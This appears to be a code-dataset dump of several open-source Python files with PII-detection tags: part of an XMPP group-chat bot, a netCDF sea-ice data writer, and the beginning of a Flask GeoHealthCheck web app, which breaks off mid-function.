+  def signal_connect(self):
+    logging.info('Scheduling re-connect...')
+    self.client.disconnect()
+
+  @message_stanza_handler()
+  def message_received(self, stanza):
+    if stanza.stanza_type != 'chat':
+      return True
+    if not stanza.body:
+      logging.info(""%s message: %s"", stanza.from_jid, stanza.serialize())
+      return True
+
+    sender = stanza.from_jid
+    body = stanza.body
+    self.current_jid = sender
+    self.now = datetime.datetime.utcnow()
+
+    logging.info('[%s] %s', sender, stanza.body)
+    if '@' not in str(sender.bare()):
+      logging.info('(server messages ignored)')
+      return True
+
+    if str(sender.bare()) in self.ignore:
+      logging.info('(The above message is ignored on purpose)')
+      return True
+
+    if getattr(config, 'ban_russian', False):
+      if str(sender.bare()).endswith('.ru'):
+        logging.info('(Russian messenger banned)')
+        return True
+      elif is_russian(body):
+        logging.info('(Russian message banned)')
+        return True
+
+    if not self.got_roster:
+      if not self.message_queue:
+        self.message_queue = []
+      self.message_queue.append((sender, stanza))
+    else:
+      self.handle_message(body)
+
+    logging.info('done with new message')
+    return True
+
+  def send_message(self, receiver, msg):
+    if isinstance(receiver, str):
+      receiver = JID(receiver)
+
+    m = Message(
+      stanza_type = 'chat',
+      from_jid = self.jid,
+      to_jid = receiver,
+      body = msg,
+    )
+    self.send(m)
+
+  def reply(self, msg):
+    self.send_message(self.current_jid, msg)
+
+  def send(self, stanza):
+    self.client.stream.send(stanza)
+
+  def delayed_call(self, seconds, func, *args, **kwargs):
+    self.client.main_loop.delayed_call(seconds, partial(func, *args, **kwargs))
+
+  @event_handler(DisconnectedEvent)
+  def handle_disconnected(self, event):
+    return QUIT
+
+  @property
+  def roster(self):
+    return self.client.roster
+
+  def get_online_users(self):
+    ret = [x.jid for x in self.roster if x.subscription == 'both' and \
+        str(x.jid) in self.presence]
+    logging.info('%d online buddies: %r', len(ret), ret)
+    return ret
+
+  def get_xmpp_status(self, jid):
+    return sorted(self.presence[str(jid)].values(), key=lambda x: x['priority'], reverse=True)[0]
+
+  def xmpp_setstatus(self, status, to_jid=None):
+    if isinstance(to_jid, str):
+      to_jid = JID(to_jid)
+
+    presence = Presence(status=status, to_jid=to_jid)
+    self.send(presence)
+
+  def update_roster(self, jid, name=NO_CHANGE, groups=NO_CHANGE):
+    self.client.roster_client.update_item(jid, name, groups)
+
+  def removeInvitation(self):
+    for ri in self.roster.values():
+      if ri.ask is not None:
+        self.client.roster_client.remove_item(ri.jid)
+        logging.info('%s removed', ri.jid)
+
+  def unsubscribe(self, jid, type='unsubscribe'):
+    presence = Presence(to_jid=jid, stanza_type=type)
+    self.send(presence)
+
+  def subscribe(self, jid):
+    self.invited[jid] = 2
+    presence = Presence(to_jid=jid, stanza_type='subscribe')
+    self.send(presence)
+
+  @presence_stanza_handler('subscribe')
+  def handle_presence_subscribe(self, stanza):
+    logging.info('%s subscribe', stanza.from_jid)
+    sender = stanza.from_jid
+    bare = sender.bare()
+
+    # avoid repeated request
+    invited = False
+    if bare not in self.subscribes:
+      invited = self.invited.get(bare, False)
+      if invited is not False:
+        if invited == 2:
+          self.invited[bare] = 1
+        else:
+          del self.invited[bare]
+          return stanza.make_accept_response()
+        # We won't deny invited members
+        self.handle_userjoin_before()
+      else:
+        if config.private and str(bare) != config.root:
+          self.send_message(sender, _('Sorry, this is a private group, and you are not 
invited.')) + return stanza.make_deny_response() + if not self.handle_userjoin_before(): + return stanza.make_deny_response() + + self.current_jid = sender + self.now = datetime.datetime.utcnow() + try: + self.handle_userjoin(action=stanza.stanza_type) + except ValidationError: + #The server is subscribing + pass + self.subscribes[bare] = True + + if stanza.stanza_type.endswith('ed'): + return stanza.make_accept_response() + + if invited is False: + presence = Presence(to_jid=stanza.from_jid.bare(), + stanza_type='subscribe') + return [stanza.make_accept_response(), presence] + + @presence_stanza_handler('subscribed') + def handle_presence_subscribed(self, stanza): + # use the same function + logging.info('%s subscribed', stanza.from_jid) + return self.handle_presence_subscribe(stanza) + + @presence_stanza_handler('unsubscribe') + def handle_presence_unsubscribe(self, stanza): + logging.info('%s unsubscribe', stanza.from_jid) + sender = stanza.from_jid + self.current_jid = sender + self.now = datetime.datetime.utcnow() + self.handle_userleave(action=stanza.stanza_type) + + if stanza.stanza_type.endswith('ed'): + return stanza.make_accept_response() + + presence = Presence(to_jid=stanza.from_jid.bare(), + stanza_type='unsubscribe') + return [stanza.make_accept_response(), presence] + + @presence_stanza_handler('unsubscribed') + def handle_presence_unsubscribed(self, stanza): + # use the same function + logging.info('%s unsubscribed', stanza.from_jid) + return self.handle_presence_unsubscribe(stanza) + + @presence_stanza_handler() + def handle_presence_available(self, stanza): + if stanza.stanza_type not in ('available', None): + return False + + jid = stanza.from_jid + plainjid = str(jid.bare()) + if plainjid == str(self.jid): + return + + self.now = datetime.datetime.utcnow() + if plainjid not in self.presence: + type = 'new' + self.current_jid = jid + self.user_update_presence(plainjid) + if conn_lost_interval and self.current_user and self.current_user.last_seen and \ + self.now - self.current_user.last_seen < conn_lost_interval: + type = 'reconnect' + self.send_lost_message() + logging.info('%s[%s] (%s)', jid, stanza.show or 'available', type) + + if self.roster and jid.bare() not in self.roster: + presence = Presence(to_jid=jid.bare(), stanza_type='subscribe') + self.send(presence) + presence = Presence(to_jid=jid.bare(), stanza_type='subscribed') + self.send(presence) + else: + if jid.resource not in self.presence[plainjid]: + self.user_update_presence(plainjid) + logging.info('%s[%s]', jid, stanza.show or 'available') + + self.presence[plainjid][jid.resource] = { + 'show': stanza.show, + 'status': stanza.status, + 'priority': stanza.priority, + } + + if self.get_user_by_jid(plainjid) is None: + try: + self.current_jid = jid + self.handle_userjoin() + except ValidationError: + #The server is subscribing + pass + + if config.warnv105 and jid.resource and \ + jid.resource.startswith('Talk.') and not jid.resource.startswith('Talk.v104'): + # Got a Talk.v107... + # No need to translate; GTalk only has a v105 for Chinese. 
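+      # (Editor's gloss, for readers who do not read Chinese: the warning
+      # sent below says, roughly, ""Warning: you may be running the
+      # unencrypted GTalk v105; others on the network could intercept your
+      # messages. This is unsafe! Please use the English GTalk v104 or
+      # another XMPP client."" The string is deliberately left in Chinese,
+      # as noted above, because it targets Chinese-locale GTalk v105 users.)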
+ self.send_message(jid, '警告:你正在使用的可能是不加密的 GTalk v105 版本。网络上的其它人可能会截获您的消息。这样不安全!请使用 GTalk v104 英文版或者其它 XMPP 客户端。\nGTalk 英文版: http://www.google.com/talk/index.html\nPidgin: http://www.pidgin.im/') + + return True + + @presence_stanza_handler('unavailable') + def handle_presence_unavailable(self, stanza): + jid = stanza.from_jid + plainjid = str(jid.bare()) + if plainjid in self.presence and plainjid != str(self.jid): + try: + del self.presence[plainjid][jid.resource] + except KeyError: + pass + if self.presence[plainjid]: + logging.info('%s[unavailable] (partly)', jid) + else: + del self.presence[plainjid] + self.now = datetime.datetime.utcnow() + self.user_disappeared(plainjid) + logging.info('%s[unavailable] (totally)', jid) + return True + + @event_handler() + def handle_all(self, event): + '''Log all events.''' + logging.info('-- {0}'.format(event)) + + def get_name(self, jid): + if isinstance(jid, str): + jid = JID(jid) + else: + jid = jid.bare() + try: + return self.roster[jid].name or hashjid(jid) + except KeyError: + return hashjid(jid) + + def get_vcard(self, jid=None, callback=None): + '''callback is used as both result handler and error handler''' + q = Iq( + to_jid = jid and jid.bare(), + stanza_type = 'get', + ) + vc = ET.Element(""{vcard-temp}vCard"") + q.add_payload(vc) + if callback: + self.stanza_processor.set_response_handlers(q, callback, callback) + self.send(q) + + def set_vcard(self, nick=None, avatar=None): + self.get_vcard(callback=partial(self._set_vcard, nick, avatar)) + + def _set_vcard(self, nick=None, avatar=None, stanza=None): + #FIXME: This doesn't seem to work with jabber.org + q = Iq( + from_jid = self.jid, + stanza_type = 'set', + ) + vc = ET.Element(""{vcard-temp}vCard"") + if nick is not None: + n = ET.SubElement(vc, '{vcard-temp}FN') + n.text = nick + if avatar is not None: + type, picfile = avatar + photo = ET.SubElement(vc, '{vcard-temp}PHOTO') + t = ET.SubElement(photo, '{vcard-temp}TYPE') + t.text = type + d = ET.SubElement(photo, '{vcard-temp}BINVAL') + data = open(picfile, 'rb').read() + d.text = base64.b64encode(data).decode('ascii') + self.avatar_hash = hashlib.new('sha1', data).hexdigest() + + q.add_payload(vc) + self.stanza_processor.set_response_handlers( + q, self._set_vcard_callback, self._set_vcard_callback) + self.send(q) + + def _set_vcard_callback(self, stanza): + if stanza.stanza_type == 'error': + logging.error('failed to set my vCard.') + else: + logging.info('my vCard set.') + self.update_presence() + + def update_presence(self): + #TODO: update for individual users + presence = self.settings['presence'] + x = ET.Element('{vcard-temp:x:update}x') + if self.avatar_hash: + photo = ET.SubElement(x, '{vcard-temp:x:update}photo') + photo.text = self.avatar_hash + presence.add_payload(x) + self.send(presence) + +def runit(settings, mysettings): + bot = ChatBot(JID(config.jid), settings, mysettings) + try: + bot.run() + # Connection resets + raise Exception + except SystemExit as e: + if e.code == CMD_RESTART: + # restart + bot.disconnect() + models.connection.disconnect() + try: + os.close(lock_fd[0]) + except: + pass + logging.info('restart...') + os.execv(sys.executable, [sys.executable] + sys.argv) + except KeyboardInterrupt: + pass + finally: + ChatBot.message_queue = bot.message_queue + bot.disconnect() + +def main(): + gp = models.connection.Group.one() + if gp and gp.status: + st = gp.status + else: + st = None + settings = dict( + # deliver here even if the admin logs in + initial_presence = Presence(priority=30, status=st), + 
poll_interval = 3, + ) + botsettings = { + 'presence': settings['initial_presence'], + } + settings.update(config.settings) + settings = XMPPSettings(settings) + + if config.trace: + logging.info('enabling trace') + for logger in ('pyxmpp2.IN', 'pyxmpp2.OUT'): + logger = logging.getLogger(logger) + logger.setLevel(logging.DEBUG) + + for logger in ( + 'pyxmpp2.mainloop.base', 'pyxmpp2.expdict', + 'pyxmpp2.mainloop.poll', 'pyxmpp2.mainloop.events', + 'pyxmpp2.transport', 'pyxmpp2.mainloop.events', + ): + logger = logging.getLogger(logger) + logger.setLevel(max((logging.INFO, config.logging_level))) + + if config.logging_level > logging.DEBUG: + restart_if_failed(runit, 3, args=(settings, botsettings)) + else: + runit(settings, botsettings) + +if __name__ == '__main__': + setup_logging() + models.init() + main() +",16313,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2012'], ['PERSON', 'lilydjwg'], ['LOCATION', 'xmpptalk'], ['PERSON', 'Iq'], ['PERSON', 'self.presence = defaultdict(dict'], ['DATE_TIME', '2 more\n seconds'], ['LOCATION', 'nick'], ['NRP', 'avatar_type'], ['NRP', 'avatar_type'], ['PERSON', 'stanza.body'], ['PERSON', ""logging.info('(server""], ['DATE_TIME', 'seconds'], ['LOCATION', 'ri'], ['LOCATION', 'del self.invited[bare'], ['PERSON', 'str(bare'], ['PERSON', 'plainjid = str(jid.bare'], ['PERSON', 'stanza.show'], ['PERSON', 'jid.resource'], ['PERSON', 'stanza.show'], ['PERSON', 'jid.resource'], ['NRP', 'Chinese'], ['PERSON', '版本。网络上的其它人可能会截获您的消息。这样不安全!请使用 GTalk'], ['PERSON', 'plainjid = str(jid.bare'], ['LOCATION', 'del self.presence[plainjid][jid.resource'], ['PERSON', 'jid = JID(jid'], ['LOCATION', 'nick'], ['LOCATION', 'self._set_vcard_callback'], ['PERSON', ""settings['initial_presence""], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'http://www.google.com/talk/index.html\\nPidgin:'], ['URL', ""http://www.pidgin.im/'""], ['URL', 'email.com'], ['URL', 'xml.et'], ['URL', 'pyxmpp2.me'], ['URL', 'pyxmpp2.pr'], ['URL', 'pyxmpp2.cl'], ['URL', 'pyxmpp2.se'], ['URL', 'pyxmpp2.ro'], ['URL', 'pyxmpp2.int'], ['URL', 'pyxmpp2.st'], ['URL', 'pyxmpp2.int'], ['URL', 'pyxmpp2.int'], ['URL', 'pyxmpp2.ext.ve'], ['URL', 'pyxmpp2.iq'], ['URL', 'config.co'], ['URL', 'self.re'], ['URL', 'self.cl'], ['URL', 'self.pr'], ['URL', 'self.su'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'self.client.co'], ['URL', 'self.client.jid.ba'], ['URL', 'logger.in'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'sender.st'], ['URL', 'self.client.st'], ['URL', 'self.client.ru'], ['URL', 'self.cl'], ['URL', 'self.client.ru'], ['URL', 'pyxmpp2.exceptions.St'], ['URL', 'self.me'], ['URL', 'self.no'], ['URL', 'self.cu'], ['URL', 'stanza.as'], ['URL', 'stanza.bo'], ['URL', 'self.me'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.si'], ['URL', 'self.se'], ['URL', 'logging.in'], ['URL', 'self.cl'], ['URL', 'stanza.st'], ['URL', 'stanza.bo'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'stanza.se'], ['URL', 'stanza.fr'], ['URL', 'stanza.bo'], ['URL', 'self.cu'], ['URL', 'self.no'], ['URL', 'logging.in'], ['URL', 'stanza.bo'], ['URL', 'sender.ba'], ['URL', 'logging.in'], ['URL', 'sender.ba'], ['URL', 'logging.in'], ['URL', 'sender.ba'], ['URL', 'logging.in'], ['URL', 'logging.in'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'logging.in'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.cu'], ['URL', 'self.client.stream.se'], ['URL', 'self.client.ma'], ['URL', 'loop.de'], ['URL', 'self.client.ro'], ['URL', 'self.ro'], ['URL', 'x.su'], ['URL', 'self.pr'], 
['URL', 'logging.in'], ['URL', 'self.pr'], ['URL', 'self.se'], ['URL', 'self.client.ro'], ['URL', 'self.roster.va'], ['URL', 'ri.as'], ['URL', 'self.client.ro'], ['URL', 'client.re'], ['URL', 'logging.in'], ['URL', 'self.se'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'stanza.fr'], ['URL', 'sender.ba'], ['URL', 'self.su'], ['URL', 'self.invited.ge'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'stanza.ma'], ['URL', 'config.pr'], ['URL', 'config.ro'], ['URL', 'self.se'], ['URL', 'stanza.ma'], ['URL', 'stanza.ma'], ['URL', 'self.cu'], ['URL', 'self.no'], ['URL', 'stanza.st'], ['URL', 'self.su'], ['URL', 'stanza.st'], ['URL', 'stanza.ma'], ['URL', 'stanza.fr'], ['URL', 'jid.ba'], ['URL', 'stanza.ma'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'stanza.fr'], ['URL', 'self.cu'], ['URL', 'self.no'], ['URL', 'stanza.st'], ['URL', 'stanza.st'], ['URL', 'stanza.ma'], ['URL', 'stanza.fr'], ['URL', 'jid.ba'], ['URL', 'stanza.ma'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'stanza.st'], ['URL', 'stanza.fr'], ['URL', 'jid.ba'], ['URL', 'self.no'], ['URL', 'self.pr'], ['URL', 'self.cu'], ['URL', 'self.us'], ['URL', 'self.cu'], ['URL', 'self.cu'], ['URL', 'user.la'], ['URL', 'self.no'], ['URL', 'self.cu'], ['URL', 'user.la'], ['URL', 'self.se'], ['URL', 'logging.in'], ['URL', 'stanza.sh'], ['URL', 'self.ro'], ['URL', 'jid.ba'], ['URL', 'self.ro'], ['URL', 'jid.ba'], ['URL', 'self.se'], ['URL', 'jid.ba'], ['URL', 'self.se'], ['URL', 'jid.re'], ['URL', 'self.pr'], ['URL', 'self.us'], ['URL', 'logging.in'], ['URL', 'stanza.sh'], ['URL', 'self.pr'], ['URL', 'jid.re'], ['URL', 'stanza.sh'], ['URL', 'stanza.st'], ['URL', 'stanza.pr'], ['URL', 'self.ge'], ['URL', 'self.cu'], ['URL', 'jid.re'], ['URL', 'jid.resource.st'], ['URL', 'jid.resource.st'], ['URL', 'self.se'], ['URL', 'stanza.fr'], ['URL', 'jid.ba'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'jid.re'], ['URL', 'self.pr'], ['URL', 'logging.in'], ['URL', 'self.pr'], ['URL', 'self.no'], ['URL', 'self.us'], ['URL', 'logging.in'], ['URL', 'logging.in'], ['URL', 'jid.ba'], ['URL', 'self.ro'], ['URL', 'jid.ba'], ['URL', 'q.ad'], ['URL', 'self.st'], ['URL', 'processor.se'], ['URL', 'self.se'], ['URL', 'self.ge'], ['URL', 'jabber.org'], ['URL', 'ET.Su'], ['URL', 'ET.Su'], ['URL', 'ET.Su'], ['URL', 'ET.Su'], ['URL', 'hashlib.ne'], ['URL', 'q.ad'], ['URL', 'self.st'], ['URL', 'processor.se'], ['URL', 'self.se'], ['URL', 'stanza.st'], ['URL', 'logging.er'], ['URL', 'logging.in'], ['URL', 'self.se'], ['URL', 'ET.Su'], ['URL', 'presence.ad'], ['URL', 'self.se'], ['URL', 'bot.ru'], ['URL', 'e.co'], ['URL', 'models.co'], ['URL', 'os.cl'], ['URL', 'logging.in'], ['URL', 'sys.ar'], ['URL', 'ChatBot.me'], ['URL', 'bot.me'], ['URL', 'models.connection.Gr'], ['URL', 'gp.st'], ['URL', 'gp.st'], ['URL', 'config.se'], ['URL', 'config.tr'], ['URL', 'logging.in'], ['URL', 'pyxmpp2.IN'], ['URL', 'logging.ge'], ['URL', 'logger.se'], ['URL', 'logging.DE'], ['URL', 'pyxmpp2.mainloop.ba'], ['URL', 'pyxmpp2.ma'], ['URL', 'pyxmpp2.ma'], ['URL', 'pyxmpp2.tr'], ['URL', 'pyxmpp2.ma'], ['URL', 'logging.ge'], ['URL', 'logger.se'], ['URL', 'logging.IN'], ['URL', 'logging.DE'], ['URL', 'models.in']]" +30,"from datetime import datetime, timedelta +from netCDF4 import Dataset +from netCDF4 import num2date +import numpy as np +import time +import os + +__author__ = 'Trond Kristiansen' +__email__ = dummy@email.com' +__created__ = datetime(2014, 1, 23) +__modified__ = 
datetime(2014, 1, 23)
+__version__ = ""0.1""
+__status__ = ""Development""
+
+
+def help():
+    """"""
+    This function generates a netCDF4 file and saves the running average
+    values for specific years into file for each IPCC AR5 model.
+
+    Used together with extractIce.py
+    """"""
+
+def writeCMIP5File(modelName,scenario,myvarname,lon,lat,time,mydata,mydataanomaly,outfilename):
+
+    myformat='NETCDF3_CLASSIC'
+
+    if os.path.exists(outfilename):
+        os.remove(outfilename)
+    print ""Results written to netcdf file: %s""%(outfilename)
+    if myvarname==""sic"": myvar=""SIC""
+
+    f1 = Dataset(outfilename, mode='w', format=myformat)
+    f1.title = ""IPCC AR5 %s""%(myvar)
+    f1.description = ""IPCC AR5 running averages of %s for model %s for scenario %s""%(myvar,modelName,scenario)
+    f1.history = ""Created "" + str(datetime.now())
+    f1.source = ""Trond Kristiansen (dummy@email.com)""
+    f1.type = ""File in NetCDF3 format created using iceExtract.py""
+    f1.Conventions = ""CF-1.0""
+
+    """"""Define dimensions""""""
+    f1.createDimension('x', len(lon))
+    f1.createDimension('y', len(lat))
+    f1.createDimension('time', None)
+
+    vnc = f1.createVariable('longitude', 'd', ('x',),zlib=False)
+    vnc.long_name = 'Longitude'
+    vnc.units = 'degree_east'
+    vnc.standard_name = 'longitude'
+    vnc[:] = lon
+
+    vnc = f1.createVariable('latitude', 'd', ('y',),zlib=False)
+    vnc.long_name = 'Latitude'
+    vnc.units = 'degree_north'
+    vnc.standard_name = 'latitude'
+    vnc[:] = lat
+
+    v_time = f1.createVariable('time', 'd', ('time',),zlib=False)
+    v_time.long_name = 'Years'
+    v_time.units = 'Years'
+    v_time.field = 'time, scalar, series'
+    v_time[:]=time
+
+    v_temp=f1.createVariable('SIC', 'd', ('time', 'y', 'x',),zlib=False)
+    v_temp.long_name = ""Sea-ice area fraction (%)""
+    v_temp.units = ""%""
+    v_temp.time = ""time""
+    v_temp.field=""SIC, scalar, series""
+    v_temp.missing_value = 1e20
+
+
+    if myvarname=='sic':
+        f1.variables['SIC'][:,:,:] = mydata
+
+    f1.close()
+",2388,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', ""Trond Kristiansen'""], ['DATE_TIME', 'years'], ['PERSON', 'lat'], ['PERSON', 'mydata'], ['LOCATION', 'mydataanomaly'], ['LOCATION', 'outfilename'], ['PERSON', 'netcdf'], ['PERSON', 'myformat'], ['PERSON', 'f1.source'], ['PERSON', 'Trond Kristiansen'], ['PERSON', ""f1.createDimension('x""], ['DATE_TIME', ""'Years'""], ['DATE_TIME', ""'Years'""], ['PERSON', 'mydata\n \n f1.close'], ['URL', 'email.com'], ['URL', 'extractIce.py'], ['URL', 'os.pa'], ['URL', 'os.re'], ['URL', 'f1.de'], ['URL', 'datetime.no'], ['URL', 'f1.so'], ['URL', 'email.com'], ['URL', 'iceExtract.py'], ['URL', 'f1.Co'], ['URL', 'f1.cr'], ['URL', 'f1.cr'], ['URL', 'f1.cr'], ['URL', 'f1.cr'], ['URL', 'vnc.st'], ['URL', 'f1.cr'], ['URL', 'vnc.st'], ['URL', 'f1.cr'], ['URL', 'time.fi'], ['URL', 'f1.cr'], ['URL', 'temp.fi'], ['URL', 'f1.va'], ['URL', 'f1.cl']]"
+31,"# =================================================================
+#
+# Authors: Tom Kralidis dummy@email.com
+#          Just van den Broecke dummy@email.com
+#
+# Copyright (c) 2014 Tom Kralidis
+#
+# Permission is hereby granted, free of charge, to any person
+# obtaining a copy of this software and associated documentation
+# files (the ""Software""), to deal in the Software without
+# restriction, including without limitation the rights to use,
+# copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the
+# Software is furnished to do so, subject to the following
+# conditions:
+#
+# The above copyright notice and this permission notice shall be +# included in all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, +# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES +# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND +# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT +# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR +# OTHER DEALINGS IN THE SOFTWARE. +# +# ================================================================= + +import base64 +import csv +import json +import logging +from io import StringIO + +from flask import (abort, flash, g, jsonify, redirect, + render_template, request, url_for) +from flask_babel import gettext +from flask_login import (LoginManager, login_user, logout_user, + current_user, login_required) +from flask_migrate import Migrate +from itertools import chain + +import views +from __init__ import __version__ +from enums import RESOURCE_TYPES +from factory import Factory +from init import App +from models import Resource, Run, ProbeVars, CheckVars, Tag, User, Recipient +from resourceauth import ResourceAuth +from util import send_email, geocode, format_checked_datetime, \ + format_run_status, format_obj_value + +# Module globals for convenience +LOGGER = logging.getLogger(__name__) +APP = App.get_app() +CONFIG = App.get_config() +DB = App.get_db() +BABEL = App.get_babel() + +MIGRATE = Migrate(APP, DB) + +LOGIN_MANAGER = LoginManager() +LOGIN_MANAGER.init_app(APP) + +LANGUAGES = ( + ('en', 'English'), + ('fr', 'Français'), + ('de', 'German'), + ('nl_NL', 'Nederlands (Nederland)'), + ('es_BO', 'Español (Bolivia)'), + ('hr_HR', 'Croatian (Croatia)') +) + +# Should GHC Runner be run within GHC webapp? +if CONFIG['GHC_RUNNER_IN_WEBAPP'] is True: + LOGGER.info('Running GHC Scheduler in WebApp') + from scheduler import start_schedule + + # Start scheduler + start_schedule() +else: + LOGGER.info('NOT Running GHC Scheduler in WebApp') + + +# commit or rollback shorthand +def db_commit(): + err = None + try: + DB.session.commit() + except Exception: + DB.session.rollback() + # finally: + # DB.session.close() + return err + + +@APP.before_request +def before_request(): + g.user = current_user + if request.args and 'lang' in request.args and request.args['lang'] != '': + g.current_lang = request.args['lang'] + if not hasattr(g, 'current_lang'): + g.current_lang = 'en' + + if CONFIG['GHC_REQUIRE_WEBAPP_AUTH'] is True: + # Login is required to access GHC Webapp. + # We need to pass-through static resources like CSS. 
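+        # (Editor's note: the whitelist below admits static assets, favicons,
+        # already-authenticated sessions, and endpoints flagged with the
+        # public_route decorator defined further down, e.g., hypothetically:
+        #
+        #     @APP.route('/ping')
+        #     @public_route
+        #     def ping():
+        #         return 'OK'
+        #
+        # public_route must be the inner decorator so that the is_public flag
+        # is set on the function that APP.route actually registers.)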
+        if any(['/static/' in request.path,
+                request.path.endswith('.ico'),
+                g.user.is_authenticated(),  # This is from Flask-Login
+                (request.endpoint is not None
+                 and getattr(APP.view_functions[request.endpoint],
+                             'is_public', False))]):
+            return  # Access granted
+        else:
+            return redirect(url_for('login'))
+
+
+# Marks (endpoint-) function as always to be accessible
+# (used for GHC_REQUIRE_WEBAPP_AUTH)
+def public_route(decorated_function):
+    decorated_function.is_public = True
+    return decorated_function
+
+
+@APP.teardown_appcontext
+def shutdown_session(exception=None):
+    DB.session.remove()
+
+
+@BABEL.localeselector
+def get_locale():
+    return g.get('current_lang', 'en')
+    # return request.accept_languages.best_match(LANGUAGES.keys())
+
+
+@LOGIN_MANAGER.user_loader
+def load_user(identifier):
+    return User.query.get(int(identifier))
+
+
+@LOGIN_MANAGER.unauthorized_handler
+def unauthorized_callback():
+    if request.query_string:
+        url = '%s%s?%s' % (request.script_root, request.path,
+                           request.query_string)
+    else:
+        url = '%s%s' % (request.script_root, request.path)
+    return redirect(url_for('login', lang=g.current_lang, next=url))
+
+
+@LOGIN_MANAGER.request_loader
+def load_user_from_request(request):
+
+    # Try to login using Basic Auth
+    # Inspiration: https://flask-login.readthedocs.io
+    # /en/latest/#custom-login-using-request-loader
+    basic_auth_val = request.headers.get('Authorization')
+    if basic_auth_val:
+        basic_auth_val = basic_auth_val.replace('Basic ', '', 1)
+        authenticated = False
+        username = None
+        try:
+            # b64decode returns bytes: decode before splitting user:password
+            username, password = \
+                base64.b64decode(basic_auth_val).decode('utf-8').split(':')
+
+            user = User.query.filter_by(username=username).first()
+            if user:
+                authenticated = user.authenticate(password)
+        except Exception:
+            # Ignore errors, they should all fail the auth attempt
+            pass
+
+        if not authenticated:
+            LOGGER.warning('Unauthorized access for user=%s' % username)
+            abort(401)
+        else:
+            return user
+
+    # TODO: may add login via api-key or token here
+
+    # finally, return None if both methods did not login the user
+    return None
+
+
+@APP.template_filter('cssize_reliability')
+def cssize_reliability(value, css_type=None):
+    """"""returns CSS button class snippet based on score""""""
+
+    number = int(value)
+
+    if CONFIG['GHC_RELIABILITY_MATRIX']['red']['min'] <= number <= \
+            CONFIG['GHC_RELIABILITY_MATRIX']['red']['max']:
+        score = 'danger'
+        panel = 'red'
+    elif (CONFIG['GHC_RELIABILITY_MATRIX']['orange']['min'] <= number <=
+            CONFIG['GHC_RELIABILITY_MATRIX']['orange']['max']):
+        score = 'warning'
+        panel = 'yellow'
+    elif (CONFIG['GHC_RELIABILITY_MATRIX']['green']['min'] <= number <=
+            CONFIG['GHC_RELIABILITY_MATRIX']['green']['max']):
+        score = 'success'
+        panel = 'green'
+    else:  # should never really get here
+        score = 'info'
+        panel = 'blue'
+
+    if css_type is not None and css_type == 'panel':
+        return panel
+    else:
+        return score
+
+
+@APP.template_filter('cssize_reliability2')
+def cssize_reliability2(value):
+    """"""returns CSS panel class snippet based on score""""""
+
+    return cssize_reliability(value, 'panel')
+
+
+@APP.template_filter('round2')
+def round2(value):
+    """"""rounds a number to 2 decimal places except for values of 0 or 100""""""
+
+    if value in [0.0, 100.0]:
+        return int(value)
+    return round(value, 2)
+
+
+@APP.context_processor
+def context_processors():
+    """"""global context processors for templates""""""
+
+    rtc = views.get_resource_types_counts()
+    tags = views.get_tag_counts()
+    return {
+        'app_version': __version__,
+        'resource_types': RESOURCE_TYPES,
+        'resource_types_counts': rtc['counts'],
+        'resources_total': rtc['total'],
+        'languages': LANGUAGES,
+        'tags': tags,
+        'tagnames': list(tags.keys())
+    }
+
+
+@APP.route('/')
+def home():
+    """"""homepage""""""
+
+    response = views.get_health_summary()
+    return render_template('home.html', response=response)
+
+
+@APP.route('/csv', endpoint='csv')
+@APP.route('/json', endpoint='json')
+def export():
+    """"""export resource list as JSON or CSV""""""
+
+    resource_type = None
+
+    if request.args.get('resource_type') in RESOURCE_TYPES.keys():
+        resource_type = request.args['resource_type']
+
+    query = request.args.get('q')
+
+    response = views.list_resources(resource_type, query)
+
+    if request.url_rule.rule == '/json':
+        json_dict = {'total': response['total'], 'resources': []}
+        for r in response['resources']:
+            try:
+                ghc_url = '%s/resource/%s' % \
+                    (CONFIG['GHC_SITE_URL'], r.identifier)
+                last_run_report = '-'
+                if r.last_run:
+                    last_run_report = r.last_run.report
+
+                json_dict['resources'].append({
+                    'resource_type': r.resource_type,
+                    'title': r.title,
+                    'url': r.url,
+                    'ghc_url': ghc_url,
+                    'ghc_json': '%s/json' % ghc_url,
+                    'ghc_csv': '%s/csv' % ghc_url,
+                    'first_run': format_checked_datetime(r.first_run),
+                    'last_run': format_checked_datetime(r.last_run),
+                    'status': format_run_status(r.last_run),
+                    'min_response_time': round(r.min_response_time, 2),
+                    'average_response_time': round(r.average_response_time, 2),
+                    'max_response_time': round(r.max_response_time, 2),
+                    'reliability': round(r.reliability, 2),
+                    'last_report': format_obj_value(last_run_report)
+                })
+            except Exception as e:
+                LOGGER.warning(
+                    'JSON error resource id=%d: %s' % (r.identifier, str(e)))
+
+        return jsonify(json_dict)
+    elif request.url_rule.rule == '/csv':
+        output = StringIO()
+        writer = csv.writer(output)
+        header = [
+            'resource_type', 'title', 'url', 'ghc_url', 'ghc_json', 'ghc_csv',
+            'first_run', 'last_run', 'status', 'min_response_time',
+            'average_response_time', 'max_response_time', 'reliability'
+        ]
+        writer.writerow(header)
